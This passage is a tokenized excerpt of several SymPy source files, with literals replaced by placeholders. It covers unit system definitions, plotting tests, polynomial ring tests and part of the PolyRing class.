<NUM_LIT:2> ) <EOL> power = Dimension ( name = "<STR_LIT>" , length = <NUM_LIT:2> , mass = <NUM_LIT:1> , time = - <NUM_LIT:3> ) <EOL> frequency = Dimension ( name = "<STR_LIT>" , symbol = "<STR_LIT:f>" , time = - <NUM_LIT:1> ) <EOL> dims = ( length , mass , time , momentum , force , energy , power , frequency ) <EOL> natural_dim = DimensionSystem ( base = ( action , energy , velocity ) , dims = dims , <EOL> name = "<STR_LIT>" ) <EOL> hbar = Constant ( action , factor = <NUM_LIT> , abbrev = "<STR_LIT>" ) <EOL> eV = Unit ( energy , factor = <NUM_LIT> , abbrev = "<STR_LIT>" ) <EOL> c = Constant ( velocity , factor = <NUM_LIT> , abbrev = "<STR_LIT:c>" ) <EOL> units = prefix_unit ( eV , PREFIXES ) <EOL> natural = UnitSystem ( base = ( hbar , eV , c ) , units = units , name = "<STR_LIT>" ) </s>
<s> from . plot import plot_backends <EOL> from . plot_implicit import plot_implicit <EOL> from . textplot import textplot <EOL> from . pygletplot import PygletPlot <EOL> from . plot import ( plot , plot_parametric , plot3d , plot3d_parametric_surface , <EOL> plot3d_parametric_line ) </s>
<s> from sympy import ( pi , sin , cos , Symbol , Integral , Sum , sqrt , log , <EOL> oo , LambertW , I , meijerg , exp_polar , Max , Piecewise ) <EOL> from sympy . plotting import ( plot , plot_parametric , plot3d_parametric_line , <EOL> plot3d , plot3d_parametric_surface ) <EOL> from sympy . plotting . plot import unset_show <EOL> from sympy . utilities . pytest import skip , raises <EOL> from sympy . plotting . experimental_lambdify import lambdify <EOL> from sympy . external import import_module <EOL> from sympy . core . decorators import wraps <EOL> from tempfile import NamedTemporaryFile <EOL> import os <EOL> import sys <EOL> import warnings <EOL> class MockPrint ( object ) : <EOL> def write ( self , s ) : <EOL> pass <EOL> def flush ( self ) : <EOL> pass <EOL> encoding = '<STR_LIT:utf-8>' <EOL> def disable_print ( func , * args , ** kwargs ) : <EOL> @ wraps ( func ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> sys . stdout = MockPrint ( ) <EOL> func ( * args , ** kwargs ) <EOL> sys . stdout = sys . __stdout__ <EOL> return wrapper <EOL> unset_show ( ) <EOL> class TmpFileManager : <EOL> tmp_files = [ ] <EOL> @ classmethod <EOL> def tmp_file ( cls , name = '<STR_LIT>' ) : <EOL> cls . tmp_files . append ( NamedTemporaryFile ( prefix = name , suffix = '<STR_LIT>' ) . name ) <EOL> return cls . tmp_files [ - <NUM_LIT:1> ] <EOL> @ classmethod <EOL> def cleanup ( cls ) : <EOL> map ( os . remove , cls . tmp_files ) <EOL> def plot_and_save ( name ) : <EOL> tmp_file = TmpFileManager . tmp_file <EOL> x = Symbol ( '<STR_LIT:x>' ) <EOL> y = Symbol ( '<STR_LIT:y>' ) <EOL> z = Symbol ( '<STR_LIT:z>' ) <EOL> p = plot ( x ) <EOL> p = plot ( x * sin ( x ) , x * cos ( x ) ) <EOL> p . extend ( p ) <EOL> p [ <NUM_LIT:0> ] . line_color = lambda a : a <EOL> p [ <NUM_LIT:1> ] . line_color = '<STR_LIT:b>' <EOL> p . title = '<STR_LIT>' <EOL> p . xlabel = '<STR_LIT>' <EOL> p [ <NUM_LIT:1> ] . label = '<STR_LIT>' <EOL> p . legend = True <EOL> p . aspect_ratio = ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> p . xlim = ( - <NUM_LIT:15> , <NUM_LIT:20> ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p . extend ( plot ( x + <NUM_LIT:1> ) ) <EOL> p . append ( plot ( x + <NUM_LIT:3> , x ** <NUM_LIT:2> ) [ <NUM_LIT:1> ] ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p [ <NUM_LIT:2> ] = plot ( x ** <NUM_LIT:2> , ( x , - <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot ( sin ( x ) , ( x , - <NUM_LIT:2> * pi , <NUM_LIT:4> * pi ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot ( sin ( x ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot ( ( x ** <NUM_LIT:2> , ( x , - <NUM_LIT:5> , <NUM_LIT:5> ) ) , ( x ** <NUM_LIT:3> , ( x , - <NUM_LIT:3> , <NUM_LIT:3> ) ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> raises ( ValueError , lambda : plot ( x , y ) ) <EOL> p = plot ( Piecewise ( ( <NUM_LIT:1> , x > <NUM_LIT:0> ) , ( <NUM_LIT:0> , True ) ) , ( x , - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> plot_parametric ( sin ( x ) , cos ( x ) ) . save ( tmp_file ( ) ) <EOL> p = plot_parametric ( sin ( x ) , cos ( x ) , ( x , - <NUM_LIT:5> , <NUM_LIT:5> ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot_parametric ( ( sin ( x ) , cos ( x ) ) , ( x , sin ( x ) ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot_parametric ( ( sin ( x ) , cos ( x ) , ( x , - <NUM_LIT:3> , <NUM_LIT:3> ) ) , ( x , sin ( x ) , ( x , - <NUM_LIT:5> , <NUM_LIT:5> ) ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot_parametric ( x , sin ( x ) , depth = <NUM_LIT> ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot_parametric ( cos ( x ) , sin ( x ) , adaptive = False , nb_of_points = <NUM_LIT> ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot3d_parametric_line ( sin ( x ) , cos ( x ) , x ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot3d_parametric_line ( <EOL> ( sin ( x ) , cos ( x ) , x , ( x , - <NUM_LIT:5> , <NUM_LIT:5> ) ) , ( cos ( x ) , sin ( x ) , x , ( x , - <NUM_LIT:3> , <NUM_LIT:3> ) ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot3d_parametric_line ( sin ( x ) , cos ( x ) , x , nb_of_points = <NUM_LIT:30> ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot3d ( x * y ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot3d ( - x * y , x * y , ( x , - <NUM_LIT:5> , <NUM_LIT:5> ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot3d ( <EOL> ( x * y , ( x , - <NUM_LIT:3> , <NUM_LIT:3> ) , ( y , - <NUM_LIT:3> , <NUM_LIT:3> ) ) , ( - x * y , ( x , - <NUM_LIT:3> , <NUM_LIT:3> ) , ( y , - <NUM_LIT:3> , <NUM_LIT:3> ) ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot3d_parametric_surface ( sin ( x + y ) , cos ( x - y ) , x - y ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot3d_parametric_surface ( <EOL> ( x * sin ( z ) , x * cos ( z ) , z , ( x , - <NUM_LIT:5> , <NUM_LIT:5> ) , ( z , - <NUM_LIT:5> , <NUM_LIT:5> ) ) , <EOL> ( sin ( x + y ) , cos ( x - y ) , x - y , ( x , - <NUM_LIT:5> , <NUM_LIT:5> ) , ( y , - <NUM_LIT:5> , <NUM_LIT:5> ) ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot ( sin ( x ) ) <EOL> p [ <NUM_LIT:0> ] . line_color = lambda a : a <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p [ <NUM_LIT:0> ] . line_color = lambda a , b : b <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot ( x * sin ( x ) , x * cos ( x ) , ( x , <NUM_LIT:0> , <NUM_LIT:10> ) ) <EOL> p [ <NUM_LIT:0> ] . line_color = lambda a : a <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p [ <NUM_LIT:0> ] . line_color = lambda a , b : a <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p [ <NUM_LIT:0> ] . line_color = lambda a , b : b <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot3d_parametric_line ( sin ( x ) + <NUM_LIT:0.1> * sin ( x ) * cos ( <NUM_LIT:7> * x ) , <EOL> cos ( x ) + <NUM_LIT:0.1> * cos ( x ) * cos ( <NUM_LIT:7> * x ) , <EOL> <NUM_LIT:0.1> * sin ( <NUM_LIT:7> * x ) , <EOL> ( x , <NUM_LIT:0> , <NUM_LIT:2> * pi ) ) <EOL> p [ <NUM_LIT:0> ] . line_color = lambda a : sin ( <NUM_LIT:4> * a ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p [ <NUM_LIT:0> ] . line_color = lambda a , b : b <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p [ <NUM_LIT:0> ] . line_color = lambda a , b , c : c <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot3d ( sin ( x ) * y , ( x , <NUM_LIT:0> , <NUM_LIT:6> * pi ) , ( y , - <NUM_LIT:5> , <NUM_LIT:5> ) ) <EOL> p [ <NUM_LIT:0> ] . surface_color = lambda a : a <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p [ <NUM_LIT:0> ] . surface_color = lambda a , b : b <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p [ <NUM_LIT:0> ] . surface_color = lambda a , b , c : c <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p [ <NUM_LIT:0> ] . surface_color = lambda a , b , c : sqrt ( ( a - <NUM_LIT:3> * pi ) ** <NUM_LIT:2> + b ** <NUM_LIT:2> ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot3d_parametric_surface ( x * cos ( <NUM_LIT:4> * y ) , x * sin ( <NUM_LIT:4> * y ) , y , <EOL> ( x , - <NUM_LIT:1> , <NUM_LIT:1> ) , ( y , - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> p [ <NUM_LIT:0> ] . surface_color = lambda a : a <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p [ <NUM_LIT:0> ] . surface_color = lambda a , b : a * b <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p [ <NUM_LIT:0> ] . surface_color = lambda a , b , c : sqrt ( a ** <NUM_LIT:2> + b ** <NUM_LIT:2> + c ** <NUM_LIT:2> ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> with warnings . catch_warnings ( record = True ) as w : <EOL> i = Integral ( log ( ( sin ( x ) ** <NUM_LIT:2> + <NUM_LIT:1> ) * sqrt ( x ** <NUM_LIT:2> + <NUM_LIT:1> ) ) , ( x , <NUM_LIT:0> , y ) ) <EOL> p = plot ( i , ( y , <NUM_LIT:1> , <NUM_LIT:5> ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> assert len ( w ) == <NUM_LIT:1> <EOL> assert issubclass ( w [ - <NUM_LIT:1> ] . category , UserWarning ) <EOL> assert "<STR_LIT>" in str ( w [ <NUM_LIT:0> ] . message ) <EOL> s = Sum ( <NUM_LIT:1> / x ** y , ( x , <NUM_LIT:1> , oo ) ) <EOL> p = plot ( s , ( y , <NUM_LIT:2> , <NUM_LIT:10> ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot ( Sum ( <NUM_LIT:1> / x , ( x , <NUM_LIT:1> , y ) ) , ( y , <NUM_LIT:2> , <NUM_LIT:10> ) , show = False ) <EOL> p [ <NUM_LIT:0> ] . only_integers = True <EOL> p [ <NUM_LIT:0> ] . steps = True <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> plot ( sin ( x ) + I * cos ( x ) ) . save ( tmp_file ( ) ) <EOL> plot ( sqrt ( sqrt ( - x ) ) ) . save ( tmp_file ( ) ) <EOL> plot ( LambertW ( x ) ) . save ( tmp_file ( ) ) <EOL> plot ( sqrt ( LambertW ( x ) ) ) . save ( tmp_file ( ) ) <EOL> plot ( ( meijerg ( ( ( <NUM_LIT:1> / <NUM_LIT:2> , ) , ( ) ) , ( ( <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:1> / <NUM_LIT:2> ) , ( ) ) , <NUM_LIT:5> * x ** <NUM_LIT:2> * exp_polar ( - I * pi ) / <NUM_LIT:2> ) <EOL> + meijerg ( ( ( <NUM_LIT:1> / <NUM_LIT:2> , ) , ( ) ) , ( ( <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:1> / <NUM_LIT:2> ) , ( ) ) , <EOL> <NUM_LIT:5> * x ** <NUM_LIT:2> * exp_polar ( I * pi ) / <NUM_LIT:2> ) ) / ( <NUM_LIT> * pi ) , ( x , <NUM_LIT> , <NUM_LIT> ) ) . save ( tmp_file ( ) ) <EOL> def test_matplotlib ( ) : <EOL> matplotlib = import_module ( '<STR_LIT>' , min_module_version = '<STR_LIT>' , catch = ( RuntimeError , ) ) <EOL> if matplotlib : <EOL> try : <EOL> plot_and_save ( '<STR_LIT:test>' ) <EOL> finally : <EOL> TmpFileManager . cleanup ( ) <EOL> else : <EOL> skip ( "<STR_LIT>" ) <EOL> def test_experimental_lambify ( ) : <EOL> x = Symbol ( '<STR_LIT:x>' ) <EOL> f = lambdify ( [ x ] , Max ( x , <NUM_LIT:5> ) ) <EOL> assert Max ( <NUM_LIT:2> , <NUM_LIT:5> ) == <NUM_LIT:5> <EOL> assert Max ( <NUM_LIT:5> , <NUM_LIT:7> ) == <NUM_LIT:7> <EOL> x = Symbol ( '<STR_LIT>' ) <EOL> f = lambdify ( [ x ] , x + <NUM_LIT:1> ) <EOL> assert f ( <NUM_LIT:1> ) == <NUM_LIT:2> <EOL> @ disable_print <EOL> def test_append_issue_7140 ( ) : <EOL> x = Symbol ( '<STR_LIT:x>' ) <EOL> p1 = plot ( x ) <EOL> p2 = plot ( x ** <NUM_LIT:2> ) <EOL> p3 = plot ( x + <NUM_LIT:2> ) <EOL> p2 . append ( p1 [ <NUM_LIT:0> ] ) <EOL> assert len ( p2 . _series ) == <NUM_LIT:2> <EOL> with raises ( TypeError ) : <EOL> p1 . append ( p2 ) <EOL> with raises ( TypeError ) : <EOL> p1 . append ( p2 . _series ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division <EOL> from sympy . utilities import public <EOL> @ public <EOL> class DomainElement ( object ) : <EOL> """<STR_LIT>""" <EOL> def parent ( self ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from sympy . polys . domains import QQ , ZZ <EOL> from sympy . polys . polyerrors import ExactQuotientFailed , CoercionFailed , NotReversible <EOL> from sympy . abc import x , y <EOL> from sympy . utilities . pytest import raises <EOL> def test_build_order ( ) : <EOL> R = QQ . old_poly_ring ( x , y , order = ( ( "<STR_LIT>" , x ) , ( "<STR_LIT>" , y ) ) ) <EOL> assert R . order ( ( <NUM_LIT:1> , <NUM_LIT:5> ) ) == ( ( <NUM_LIT:1> , ) , ( - <NUM_LIT:5> , ) ) <EOL> def test_globalring ( ) : <EOL> Qxy = QQ . old_frac_field ( x , y ) <EOL> R = QQ . old_poly_ring ( x , y ) <EOL> X = R . convert ( x ) <EOL> Y = R . convert ( y ) <EOL> assert x in R <EOL> assert <NUM_LIT:1> / x not in R <EOL> assert <NUM_LIT:1> / ( <NUM_LIT:1> + x ) not in R <EOL> assert Y in R <EOL> assert X . ring == R <EOL> assert X * ( Y ** <NUM_LIT:2> + <NUM_LIT:1> ) == R . convert ( x * ( y ** <NUM_LIT:2> + <NUM_LIT:1> ) ) <EOL> assert X * y == X * Y == R . convert ( x * y ) == x * Y <EOL> assert X + y == X + Y == R . convert ( x + y ) == x + Y <EOL> assert X - y == X - Y == R . convert ( x - y ) == x - Y <EOL> assert X + <NUM_LIT:1> == R . convert ( x + <NUM_LIT:1> ) <EOL> raises ( ExactQuotientFailed , lambda : X / Y ) <EOL> raises ( ExactQuotientFailed , lambda : x / Y ) <EOL> raises ( ExactQuotientFailed , lambda : X / y ) <EOL> assert X ** <NUM_LIT:2> / X == X <EOL> assert R . from_GlobalPolynomialRing ( ZZ . old_poly_ring ( x , y ) . convert ( x ) , ZZ . old_poly_ring ( x , y ) ) == X <EOL> assert R . from_FractionField ( Qxy . convert ( x ) , Qxy ) == X <EOL> assert R . from_FractionField ( Qxy . convert ( x ) / y , Qxy ) is None <EOL> assert R . _sdm_to_vector ( R . _vector_to_sdm ( [ X , Y ] , R . order ) , <NUM_LIT:2> ) == [ X , Y ] <EOL> def test_localring ( ) : <EOL> Qxy = QQ . old_frac_field ( x , y ) <EOL> R = QQ . old_poly_ring ( x , y , order = "<STR_LIT>" ) <EOL> X = R . convert ( x ) <EOL> Y = R . convert ( y ) <EOL> assert x in R <EOL> assert <NUM_LIT:1> / x not in R <EOL> assert <NUM_LIT:1> / ( <NUM_LIT:1> + x ) in R <EOL> assert Y in R <EOL> assert X . ring == R <EOL> assert X * ( Y ** <NUM_LIT:2> + <NUM_LIT:1> ) / ( <NUM_LIT:1> + X ) == R . convert ( x * ( y ** <NUM_LIT:2> + <NUM_LIT:1> ) / ( <NUM_LIT:1> + x ) ) <EOL> assert X * y == X * Y <EOL> raises ( ExactQuotientFailed , lambda : X / Y ) <EOL> raises ( ExactQuotientFailed , lambda : x / Y ) <EOL> raises ( ExactQuotientFailed , lambda : X / y ) <EOL> assert X + y == X + Y == R . convert ( x + y ) == x + Y <EOL> assert X - y == X - Y == R . convert ( x - y ) == x - Y <EOL> assert X + <NUM_LIT:1> == R . convert ( x + <NUM_LIT:1> ) <EOL> assert X ** <NUM_LIT:2> / X == X <EOL> assert R . from_GlobalPolynomialRing ( ZZ . old_poly_ring ( x , y ) . convert ( x ) , ZZ . old_poly_ring ( x , y ) ) == X <EOL> assert R . from_FractionField ( Qxy . convert ( x ) , Qxy ) == X <EOL> raises ( CoercionFailed , lambda : R . from_FractionField ( Qxy . convert ( x ) / y , Qxy ) ) <EOL> raises ( ExactQuotientFailed , lambda : X / Y ) <EOL> raises ( NotReversible , lambda : X . invert ( ) ) <EOL> assert R . _sdm_to_vector ( <EOL> R . _vector_to_sdm ( [ X / ( X + <NUM_LIT:1> ) , Y / ( <NUM_LIT:1> + X * Y ) ] , R . order ) , <NUM_LIT:2> ) == [ X * ( <NUM_LIT:1> + X * Y ) , Y * ( <NUM_LIT:1> + X ) ] <EOL> def test_conversion ( ) : <EOL> L = QQ . old_poly_ring ( x , y , order = "<STR_LIT>" ) <EOL> G = QQ . old_poly_ring ( x , y ) <EOL> assert L . convert ( x ) == L . convert ( G . convert ( x ) , G ) <EOL> assert G . convert ( x ) == G . convert ( L . convert ( x ) , L ) <EOL> raises ( CoercionFailed , lambda : G . convert ( L . convert ( <NUM_LIT:1> / ( <NUM_LIT:1> + x ) ) , L ) ) <EOL> def test_units ( ) : <EOL> R = QQ . old_poly_ring ( x ) <EOL> assert R . is_unit ( R . convert ( <NUM_LIT:1> ) ) <EOL> assert R . is_unit ( R . convert ( <NUM_LIT:2> ) ) <EOL> assert not R . is_unit ( R . convert ( x ) ) <EOL> assert not R . is_unit ( R . convert ( <NUM_LIT:1> + x ) ) <EOL> R = QQ . old_poly_ring ( x , order = '<STR_LIT>' ) <EOL> assert R . is_unit ( R . convert ( <NUM_LIT:1> ) ) <EOL> assert R . is_unit ( R . convert ( <NUM_LIT:2> ) ) <EOL> assert not R . is_unit ( R . convert ( x ) ) <EOL> assert R . is_unit ( R . convert ( <NUM_LIT:1> + x ) ) <EOL> R = ZZ . old_poly_ring ( x ) <EOL> assert R . is_unit ( R . convert ( <NUM_LIT:1> ) ) <EOL> assert not R . is_unit ( R . convert ( <NUM_LIT:2> ) ) <EOL> assert not R . is_unit ( R . convert ( x ) ) <EOL> assert not R . is_unit ( R . convert ( <NUM_LIT:1> + x ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division <EOL> from operator import add , mul , lt , le , gt , ge <EOL> from types import GeneratorType <EOL> from sympy . core . expr import Expr <EOL> from sympy . core . symbol import Symbol , symbols as _symbols <EOL> from sympy . core . numbers import igcd , oo <EOL> from sympy . core . sympify import CantSympify , sympify <EOL> from sympy . core . compatibility import is_sequence , reduce , string_types , range <EOL> from sympy . ntheory . multinomial import multinomial_coefficients <EOL> from sympy . polys . monomials import MonomialOps <EOL> from sympy . polys . orderings import lex <EOL> from sympy . polys . heuristicgcd import heugcd <EOL> from sympy . polys . compatibility import IPolys <EOL> from sympy . polys . polyutils import expr_from_dict , _dict_reorder , _parallel_dict_from_expr <EOL> from sympy . polys . polyerrors import CoercionFailed , GeneratorsError , GeneratorsNeeded , ExactQuotientFailed , MultivariatePolynomialError <EOL> from sympy . polys . domains . domainelement import DomainElement <EOL> from sympy . polys . domains . polynomialring import PolynomialRing <EOL> from sympy . polys . polyoptions import Domain as DomainOpt , Order as OrderOpt , build_options <EOL> from sympy . polys . densebasic import dmp_to_dict , dmp_from_dict <EOL> from sympy . polys . constructor import construct_domain <EOL> from sympy . printing . defaults import DefaultPrinting <EOL> from sympy . utilities import public <EOL> from sympy . utilities . magic import pollute <EOL> @ public <EOL> def ring ( symbols , domain , order = lex ) : <EOL> """<STR_LIT>""" <EOL> _ring = PolyRing ( symbols , domain , order ) <EOL> return ( _ring , ) + _ring . gens <EOL> @ public <EOL> def xring ( symbols , domain , order = lex ) : <EOL> """<STR_LIT>""" <EOL> _ring = PolyRing ( symbols , domain , order ) <EOL> return ( _ring , _ring . gens ) <EOL> @ public <EOL> def vring ( symbols , domain , order = lex ) : <EOL> """<STR_LIT>""" <EOL> _ring = PolyRing ( symbols , domain , order ) <EOL> pollute ( [ sym . name for sym in _ring . symbols ] , _ring . gens ) <EOL> return _ring <EOL> @ public <EOL> def sring ( exprs , * symbols , ** options ) : <EOL> """<STR_LIT>""" <EOL> single = False <EOL> if not is_sequence ( exprs ) : <EOL> exprs , single = [ exprs ] , True <EOL> exprs = list ( map ( sympify , exprs ) ) <EOL> opt = build_options ( symbols , options ) <EOL> reps , opt = _parallel_dict_from_expr ( exprs , opt ) <EOL> if opt . domain is None : <EOL> coeffs = sum ( [ list ( rep . values ( ) ) for rep in reps ] , [ ] ) <EOL> opt . domain , _ = construct_domain ( coeffs , opt = opt ) <EOL> _ring = PolyRing ( opt . gens , opt . domain , opt . order ) <EOL> polys = list ( map ( _ring . from_dict , reps ) ) <EOL> if single : <EOL> return ( _ring , polys [ <NUM_LIT:0> ] ) <EOL> else : <EOL> return ( _ring , polys ) <EOL> def _parse_symbols ( symbols ) : <EOL> if not symbols : <EOL> raise GeneratorsNeeded ( "<STR_LIT>" ) <EOL> if isinstance ( symbols , string_types ) : <EOL> return _symbols ( symbols , seq = True ) <EOL> elif isinstance ( symbols , Expr ) : <EOL> return ( symbols , ) <EOL> elif is_sequence ( symbols ) : <EOL> if all ( isinstance ( s , string_types ) for s in symbols ) : <EOL> return _symbols ( symbols ) <EOL> elif all ( isinstance ( s , Expr ) for s in symbols ) : <EOL> return symbols <EOL> raise GeneratorsError ( "<STR_LIT>" ) <EOL> _ring_cache = { } <EOL> class PolyRing ( DefaultPrinting , IPolys ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , symbols , domain , order = lex ) : <EOL> symbols = tuple ( _parse_symbols ( symbols ) ) <EOL> ngens = len ( symbols ) <EOL> domain = DomainOpt . preprocess ( domain ) <EOL> order = OrderOpt . preprocess ( order ) <EOL> _hash = hash ( ( cls . __name__ , symbols , ngens , domain , order ) ) <EOL> obj = _ring_cache . get ( _hash ) <EOL> if obj is None : <EOL> if domain . is_Composite and set ( symbols ) & set ( domain . symbols ) : <EOL> raise GeneratorsError ( "<STR_LIT>" ) <EOL> obj = object . __new__ ( cls ) <EOL> obj . _hash = _hash <EOL> obj . dtype = type ( "<STR_LIT>" , ( PolyElement , ) , { "<STR_LIT>" : obj } ) <EOL> obj . symbols = symbols <EOL> obj . ngens = ngens <EOL> obj . domain = domain <EOL> obj . order = order <EOL> obj . zero_monom = ( <NUM_LIT:0> , ) * ngens <EOL> obj . gens = obj . _gens ( ) <EOL> obj . _gens_set = set ( obj . gens ) <EOL> obj . _one = [ ( obj . zero_monom , domain . one ) ] <EOL> codegen = MonomialOps ( ngens ) <EOL> obj . monomial_mul = codegen . mul ( ) <EOL> obj . monomial_pow = codegen . pow ( ) <EOL> obj . monomial_mulpow = codegen . mulpow ( ) <EOL> obj . monomial_ldiv = codegen . ldiv ( ) <EOL> obj . monomial_div = codegen . div ( ) <EOL> obj . monomial_lcm = codegen . lcm ( ) <EOL> obj . monomial_gcd = codegen . gcd ( ) <EOL> if order is lex : <EOL> obj . leading_expv = lambda f : max ( f ) <EOL> else : <EOL> obj . leading_expv = lambda f : max ( f , key = order ) <EOL> for symbol , generator in zip ( obj . symbols , obj . gens ) : <EOL> if isinstance ( symbol , Symbol ) : <EOL> name = symbol . name <EOL> if not hasattr ( obj , name ) : <EOL> setattr ( obj , name , generator ) <EOL> _ring_cache [ _hash ] = obj <EOL> return obj <EOL> def _gens ( self ) : <EOL> """<STR_LIT>""" <EOL> one = self . domain . one <EOL> _gens = [ ] <EOL> for i in range ( self . ngens ) : <EOL> expv = self . monomial_basis ( i ) <EOL> poly = self . zero <EOL> poly [ expv ] = one <EOL> _gens . append ( poly ) <EOL> return tuple ( _gens ) <EOL> def __getnewargs__ ( self ) : <EOL> return ( self . symbols , self . domain , self . order ) <EOL> def __getstate__ ( self ) : <EOL> state = self . __dict__ . copy ( ) <EOL> del state [ "<STR_LIT>" ] <EOL> for key , value in state . items ( ) : <EOL> if key . startswith ( "<STR_LIT>" ) : <EOL> del state [ key ] <EOL> return state <EOL> def __hash__ ( self ) : <EOL> return self . _hash <EOL> def __eq__ ( self , other ) : <EOL> return self is other <EOL> def __ne__ ( self , other ) : <EOL> return self is not other <EOL> def clone ( self , symbols = None , domain = None , order = None ) : <EOL> return self . __class__ ( symbols or self . symbols , domain or self . domain , order or self . order ) <EOL> def monomial_basis ( self , i ) : <EOL> """<STR_LIT>""" <EOL> basis = [ <NUM_LIT:0> ] * self . ngens <EOL> basis [ i ] = <NUM_LIT:1> <EOL> return tuple ( basis ) <EOL> @ property <EOL> def zero ( self ) : <EOL> return self . dtype ( ) <EOL> @ property <EOL> def one ( self ) : <EOL> return self . dtype ( self . _one ) <EOL> def domain_new ( self , element , orig_domain = None ) : <EOL> return self . domain . convert ( element , orig_domain ) <EOL> def ground_new ( self , coeff ) : <EOL> return self . term_new ( self . zero_monom , coeff ) <EOL> def term_new ( self , monom , coeff ) : <EOL> coeff = self . domain_new ( coeff ) <EOL> poly = self . zero <EOL> if coeff : <EOL> poly [ monom ] = coeff <EOL> return poly <EOL> def ring_new ( self , element ) : <EOL> if isinstance ( element , PolyElement ) : <EOL> if self == element . ring : <EOL> return element <EOL> elif isinstance ( self . domain , PolynomialRing ) and self . domain . ring == element . ring : <EOL> return self . ground_new ( element ) <EOL> else : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> elif isinstance ( element , string_types ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> elif isinstance ( element , dict ) : <EOL> return self . from_dict ( element ) <EOL> elif isinstance ( element , list ) : <EOL> try : <EOL> return self . from_terms ( element ) <EOL> except ValueError : <EOL> return self . from_list ( element ) <EOL> elif isinstance ( element , Expr ) : <EOL> return self . from_expr ( element ) <EOL> else : <EOL> return self . ground_new ( element ) <EOL> __call__ = ring_new <EOL> def from_dict ( self , element ) : <EOL> domain_new = self . domain_new <EOL> poly = self . zero <EOL> for monom , coeff in element . items ( ) : <EOL> coeff = domain_new ( coeff ) <EOL> if coeff : <EOL> poly [ monom ] = coeff <EOL> return poly <EOL> def from_terms ( self , element ) : <EOL> return self . from_dict ( dict ( element ) ) <EOL> def from_list ( self , element ) : <EOL> return self . from_dict ( dmp_to_dict ( element , self . ngens - <NUM_LIT:1> , self . domain ) ) <EOL> def _rebuild_expr ( self , expr , mapping ) : <EOL> domain = self . domain <EOL> def _rebuild ( expr ) : <EOL> generator = mapping . get ( expr ) <EOL> if generator is not None : <EOL> return generator <EOL> elif expr . is_Add : <EOL> return reduce ( add , list ( map ( _rebuild , expr . args ) ) ) 